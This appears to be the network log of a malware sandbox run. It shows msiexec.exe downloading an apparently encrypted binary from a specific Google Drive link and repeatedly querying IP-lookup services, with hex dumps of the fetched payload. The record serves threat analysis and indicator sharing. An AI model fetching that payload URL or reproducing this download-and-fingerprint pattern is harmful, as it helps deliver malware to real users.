Oct 28, 2024 06:47:21.073637009 CET	53	52990	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 28, 2024 06:47:13.577642918 CET	192.168.2.4	1.1.1.1	0xfc2c	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Oct 28, 2024 06:47:14.928093910 CET	192.168.2.4	1.1.1.1	0xb18c	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Oct 28, 2024 06:47:19.916939974 CET	192.168.2.4	1.1.1.1	0x6a9d	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 28, 2024 06:47:21.065531969 CET	192.168.2.4	1.1.1.1	0x5b0c	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 28, 2024 06:47:13.585413933 CET	1.1.1.1	192.168.2.4	0xfc2c	No error (0)	drive.google.com		142.250.185.206	A (IP address)	IN (0x0001)	false
Oct 28, 2024 06:47:14.935728073 CET	1.1.1.1	192.168.2.4	0xb18c	No error (0)	drive.usercontent.google.com		172.217.16.193	A (IP address)	IN (0x0001)	false
Oct 28, 2024 06:47:19.924904108 CET	1.1.1.1	192.168.2.4	0x6a9d	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 28, 2024 06:47:19.924904108 CET	1.1.1.1	192.168.2.4	0x6a9d	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 28, 2024 06:47:19.924904108 CET	1.1.1.1	192.168.2.4	0x6a9d	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 28, 2024 06:47:19.924904108 CET	1.1.1.1	192.168.2.4	0x6a9d	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 28, 2024 06:47:19.924904108 CET	1.1.1.1	192.168.2.4	0x6a9d	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 28, 2024 06:47:19.924904108 CET	1.1.1.1	192.168.2.4	0x6a9d	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 28, 2024 06:47:21.073637009 CET	1.1.1.1	192.168.2.4	0x5b0c	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 28, 2024 06:47:21.073637009 CET	1.1.1.1	192.168.2.4	0x5b0c	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	51943	158.101.44.242	80	5788	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 06:47:19.937700987 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 06:47:20.583868027 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 05:47:20 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 10fdcc9968b87133ad44526926e09e49 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>
Oct 28, 2024 06:47:20.589113951 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 28, 2024 06:47:20.737340927 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 05:47:20 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6cc12b357b1cbb1d54af874a7c69c64e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>
Oct 28, 2024 06:47:21.870565891 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 28, 2024 06:47:22.018959045 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 05:47:21 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: eee82cffdcca6ff1e8a306f679f1f266 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	51966	158.101.44.242	80	5788	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 06:47:23.858371973 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 28, 2024 06:47:24.495786905 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 05:47:24 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 99478933d238e1005b3746c051cda6c1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	51973	158.101.44.242	80	5788	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 06:47:25.276262999 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 06:47:25.914880991 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 05:47:25 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ed3115284630e7f31c8dcf214e36e442 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	51985	158.101.44.242	80	5788	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 06:47:26.680152893 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 06:47:28.170763969 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 05:47:28 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b3161e61eac438b06b0bc617147570b8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	51998	158.101.44.242	80	5788	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 06:47:29.132842064 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 06:47:30.018893003 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 05:47:29 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 12ff71f0df32df554b4627b3f2fc7c39 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	52009	158.101.44.242	80	5788	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 06:47:30.795032978 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 06:47:31.445050001 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 05:47:31 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 98a1d0b80c892a97a2177484c6edc34d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	52021	158.101.44.242	80	5788	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 06:47:32.244872093 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 06:47:32.884517908 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 05:47:32 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d19cc7f8b209d5e7708ca7473eb09734 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	51907	142.250.185.206	443	5788	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 05:47:14 UTC	216	OUT	GET /uc?export=download&id=1tCaqQKvS9rlIMPrX0iRkU0L1WHfp7rKc HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-10-28 05:47:14 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 28 Oct 2024 05:47:14 GMT Location: https://drive.usercontent.google.com/download?id=1tCaqQKvS9rlIMPrX0iRkU0L1WHfp7rKc&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-m1QAeqRzHk6rSIqsYerI-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	51917	172.217.16.193	443	5788	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 05:47:16 UTC	258	OUT	GET /download?id=1tCaqQKvS9rlIMPrX0iRkU0L1WHfp7rKc&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-10-28 05:47:18 UTC	4933	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="FbTTxxaBDewHtzWhiFrSxKxK149.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 132160 Last-Modified: Tue, 22 Oct 2024 16:08:55 GMT X-GUploader-UploadID: AHmUCY3a52Jb1GyK1U4LzCkK2xV3df0hv3V3quKGI56bXvJTu7IgHYKajxbqzDEcx75b1wD-8erHDALMjQ Date: Mon, 28 Oct 2024 05:47:18 GMT Expires: Mon, 28 Oct 2024 05:47:18 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=2xIDiw== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-28 05:47:18 UTC	4933	IN	Data Raw: ed d0 0b 1b 7d 81 69 d2 e8 e7 69 b6 cf cf 94 67 3d 3a 85 1b 5a b5 3b 5f 86 2b 68 d0 13 f0 53 b8 10 50 ad 42 c7 23 25 45 43 5a 85 8e 53 36 ec 0c 69 0d cb ff e2 90 ec 2d 7f 49 f3 c3 fa 72 aa 02 60 a5 3f e4 c3 fc 0b f9 63 83 83 1e 4c 18 9d e7 f8 2c 79 94 90 f6 cf 36 44 e5 56 14 e9 98 48 ef fe d9 53 89 b3 e1 1e 90 59 47 5d 04 dc e3 07 17 28 c7 37 35 74 39 82 6b 0a 69 9d d6 ca 6e 10 11 f4 e2 1a 64 04 1b 7d 1d 5c a0 5d bb 7d a8 25 93 e2 8b 24 74 6a 33 a0 12 68 a2 da b9 4e ca 27 54 47 84 c6 66 ad fb ff 29 ab 44 14 ac 64 38 31 3a b4 34 01 05 cf 49 fb c1 ed e9 4f 83 ba 55 37 93 bb a0 69 7d 0b 5b 87 ff ce 60 03 e3 63 46 5b 00 02 75 e4 4d fb fe d0 38 41 35 6f 9f 22 44 da 38 9a db 3e 05 1e e1 21 ee fd aa 4f 5b d8 8f e8 5a 3d 5f d7 0d bc 63 72 8b 22 20 4c f9 51 d6 7f Data Ascii: }iig=:Z;_+hSPB#%ECZS6i-Ir`?cL,y6DVHSYG](75t9kind}\]}%$tj3hN'TGf)Dd81:4IOU7i}[`cF[uM8A5o"D8>!O[Z=_cr" LQ
2024-10-28 05:47:19 UTC	4829	IN	Data Raw: 76 09 67 74 78 b4 18 f8 30 20 06 a4 42 d3 2a e1 99 13 e0 59 96 17 df 8b 33 70 fc 1c 9c 97 5f 77 5e cd 7f 28 20 95 45 46 5e b0 de 01 c5 92 99 93 52 27 76 63 53 fd c9 8a 32 07 8a 52 5d 11 1a b6 6a 59 2e 80 36 45 7d 93 90 81 ff ff da b7 e6 a1 9e 32 c0 16 f0 fc 32 ec ca 0d af 38 e1 ee d5 45 3a 2b d6 78 31 ab 04 64 b4 57 fd d3 d5 ac 14 5d 5d 8a fb 98 8e 16 f3 67 f3 21 3b ac be ef ca 4a 2c 09 36 b5 e9 95 44 3d ef 56 64 4b bd 57 b4 8c 9c 59 89 c3 43 3b 8f 05 35 08 0e dc 93 a5 32 37 9a 45 56 7e 39 f2 c9 2f 76 c3 a4 3f 64 10 61 58 d8 bf 35 76 0a 71 d0 0d ba 79 e8 d0 fb f0 f1 8b 88 a6 21 07 3d b5 ef 03 cf 8a 78 0a bb 2b 49 a8 ae a4 73 2f ac 95 24 f9 80 70 8c 50 d5 47 05 bd 29 d2 6a e1 34 54 ee d6 8c 3d 4a b0 55 47 31 ce fa 0f 0f 9e 50 84 8f b5 68 8b e2 11 ad 51 00 Data Ascii: vgtx0 B*Y3p_w^( EF^R'vcS2R]jY.6E}228E:+x1dW]]g!;J,6D=VdKWYC;527EV~9/v?daX5vqy!=x+Is/$pPG)j4T=JUG1PhQ
2024-10-28 05:47:19 UTC	1326	IN	Data Raw: 6a bc 7c 94 e6 27 6c 4f 38 a5 e8 3f a7 c5 a9 99 ed 8a 1a 68 c4 4b 26 1c 8c 26 bd 6d f6 a4 95 50 47 5f 0a ca 40 5d d2 11 59 2b b2 e4 e3 95 a8 28 74 b6 cd cc a9 aa 7f ca 2a 2b c1 f7 00 f7 cd cd a9 cd 61 70 f5 e6 a2 5b 8c 01 b0 12 53 23 fb 33 c5 a4 15 05 b8 9f ec 7c 52 db bd a9 8b 8b a6 7d 1d 87 72 31 e3 b3 07 cf 5c 8c c8 2f db cc a9 aa 24 ad f2 c4 43 aa e5 4a ea e2 0b 69 45 63 84 23 66 55 9b e0 06 4b 0f 29 4e 7a cb 6e 0c ac ee 6c af 3e c8 4f 0c de ed 5a 00 67 05 c9 99 16 bc 2d d1 0f a4 38 62 0b fe c5 66 e2 ff 96 67 77 bd 25 2f 87 4c 4e 49 38 c4 7c a7 25 5a ad 9d 69 3b ed 92 b4 44 b7 0d 91 fc 23 85 53 76 02 53 69 87 38 a9 35 52 6a 77 68 75 69 4a 54 22 61 cd 3b e1 33 a0 4f 8f 78 98 f9 e1 e6 c5 9a 16 80 54 c9 f3 99 55 40 30 fd 9e 77 62 25 1a a4 b4 a0 ab 63 c6 Data Ascii: j\|'lO8?hK&&mPG_@]Y+(t*+ap[S#3\|R}r1\/$CJiEc#fUK)Nznl>OZg-8bfgw%/LNI8\|%Zi;D#SvSi85RjwhuiJT"a;3OxTU@0wb%c
2024-10-28 05:47:19 UTC	1378	IN	Data Raw: a5 3a 7c 69 03 c9 65 54 b2 bd 03 8b 8f df 9c 0c 81 6e b3 c7 cf 08 c5 4d 8d ac 70 e4 f7 d9 bc 06 f7 f5 b6 44 aa 1b 3b 96 43 1a 63 63 62 e7 07 70 3a 23 f3 02 48 60 85 65 71 c1 6c 02 91 99 b5 a8 51 6f 4f 0c c5 90 5b 2a 67 04 de b9 ce b4 42 75 60 6e 32 71 05 fe c5 68 f3 76 96 67 79 d0 0b 3e 8e 65 e6 2e 2f d5 71 bd fb 5a ad 96 45 27 f5 84 c9 3e 7b 0d 90 99 22 94 5b 13 cf 8f 78 89 32 a9 38 52 6a 77 68 75 69 4a 55 22 3b 09 2e e1 49 56 ff 8f 78 92 87 ee ec ed cd 64 4f 49 17 83 89 57 16 31 e1 94 61 9e 24 6e a8 94 34 92 2c c7 91 48 aa b5 20 a0 25 2d ff a9 97 7e fc 0b f3 4f 3c 83 1e b9 e7 ee 27 40 2c 73 87 9d e7 c2 48 22 e5 56 10 9a 59 48 ef f4 b6 91 89 b3 eb 1e 81 54 28 9e 04 dc e9 79 3e 28 c7 33 5a b0 39 82 61 0a 78 90 a4 c7 79 10 61 d2 4c a0 6a 0e dd d7 c7 7d 68 Data Ascii: :\|ieTnMpD;Cccbp:#H`eqlQoO[*gBu`n2qhvgy>e./qZE'>{"[x28RjwhuiJU";.IVxdOIW1a$n4,H %-~O<'@,sH"VYHT(y>(3Z9axyaLj}h
2024-10-28 05:47:19 UTC	1378	IN	Data Raw: 75 63 5f 31 f5 13 5a 24 8e 9b 88 ff 85 6b 95 eb f2 c4 37 c9 16 8a 2d cb f3 9f 75 53 38 f0 97 5f bd 25 7d ae 96 32 ba 7e d0 87 3b 74 a1 de ac 02 3b 8c 71 e4 c0 f6 1a f1 08 5c 83 1e b9 e7 8c ee 3e 1c 79 94 94 99 2f 36 04 ef 56 3c be 98 48 e9 fe f1 0b 89 b3 e7 1e 90 87 57 78 2c e8 e3 07 1d 3b cc 37 1d 27 39 82 61 d4 69 9d fc 4a 6e 51 0d fa fd a0 6a 04 af 58 d0 7d 18 c8 f6 b0 89 b1 fa 8b f8 14 04 18 5c 82 60 09 ce e1 ea 26 a4 08 38 33 a4 80 03 8d 98 8a 39 92 2d 7a 88 52 8c 74 1a a9 4d 4d 36 e1 44 fc dd 37 e8 45 85 83 8d 37 93 eb f1 b9 14 47 5a 85 d7 3a 4d 94 8f 11 4d 4c 00 72 62 69 4e 1b fe d3 1c 5c 4a 12 9f 22 ae f3 3c 9a cf 38 6a a8 e1 21 e4 91 f1 54 5b a8 87 8d 5a 3d 75 ab 3c bc 63 36 a3 68 00 4c f3 23 df 66 00 33 b0 27 38 3f ed 61 25 f3 82 7b 0c 26 5f f5 Data Ascii: uc_1Z$k7-uS8_%}2~;t;q\>y/6V<HWx,;7'9aiJnQjX}\`&839-zRtMM6D7E7GZ:MMLrbiN\J"<8j!T[Z=u<c6hL#f3'8?a%{&_
2024-10-28 05:47:19 UTC	1378	IN	Data Raw: 79 db 12 fc d6 fa aa 8d 8c 32 3b 33 ae af 2b 3f 89 8a 4d 8c 42 02 8c 20 7d 6e 12 d3 70 65 66 cb 5f c6 c2 c9 45 4a 83 ba 77 37 93 fa e5 17 5d 47 5a 80 90 f1 4d 94 8f 11 6b 5a 00 72 63 cc 1b 1b fe d8 2f b4 37 35 99 1b 20 de 38 9a b1 27 05 1e e5 53 15 f5 a6 3d 4d f0 f9 e8 5a 37 69 2b 0c b7 64 0b af 23 00 4c ed 81 bd 7f 00 42 b0 40 38 3f ed b1 3a f0 96 23 ac ab 5c ff 82 f0 c4 1d 01 2c ad 61 ed b9 b1 e7 d2 fc c5 d4 a0 f1 3d de e4 ed 95 e2 a3 fc 7a 32 4a 1e 3b d3 67 95 39 52 5c ea 1d 10 b7 d4 b3 2e ca c3 ed b1 02 e3 3f 7d 92 95 db d9 f0 4d 22 46 3a e3 94 ea 8d 3d bb 2f 13 02 9e 9e 83 84 9b 3c 5a bf 98 bb 92 1d 54 1f 21 bc 89 fb 60 08 46 bb 37 52 35 21 4e 94 c2 a9 91 8e b2 2b 4e e0 47 a0 54 4f c0 19 89 e6 2a 38 b5 06 74 80 2e 22 95 a7 63 32 1e e0 14 8b 61 16 c5 Data Ascii: y2;3+?MB }npef_EJw7]GZMkZrc/75 8'S=MZ7i+d#LB@8?:#\,a=z2J;g9R\.?}M"F:=/<ZT!`F7R5!N+NGTO*8t."c2a
2024-10-28 05:47:19 UTC	1378	IN	Data Raw: fc 5f ba aa 62 a1 d4 21 de 0e e0 95 e2 29 bc 6d 1a f1 60 0a d9 c5 b4 09 6a 9b f0 17 1e 1b f1 aa 02 53 89 ed bb aa 64 31 1b 2d a5 6c a9 52 6f 2d c2 3a e9 37 ce f6 35 c9 6c 17 14 9c f8 20 84 eb 48 54 b7 e6 94 ba 54 50 61 07 ce 40 e7 13 c1 6e e6 3d 3d 89 30 58 8f d7 a9 2c 8e b2 27 53 b3 12 85 7c 7a e5 0f f1 1c 24 38 ed f7 51 97 0c 4d 95 a7 69 90 3b f8 4c 8f 0b 16 b5 c8 68 71 82 fa d2 b7 70 8e 06 4a d8 5c 6e 26 91 5f 92 c9 c9 59 0b 15 32 1f 70 cf 45 d1 18 97 dd a0 76 bc 4d 4b 87 36 9b d1 0a 4a 88 c3 2c 0b 0c 98 3a f2 77 8c 2e 2a ea 43 2b 29 f9 5c 75 32 b7 d3 30 60 9d e2 ed 97 74 54 a8 08 f9 55 bf b0 9a ad ab 5d 97 1e 4e be 5b 3f 67 33 cc 6b ba e6 2a 15 f5 16 c1 9b 8c ec b6 36 9a c1 d9 fc 54 bc b3 e0 00 2d d2 e1 91 c5 23 dd 54 73 80 b5 70 dd e6 65 b8 75 de a9 Data Ascii: _b!)m`jSd1-lRo-:75l 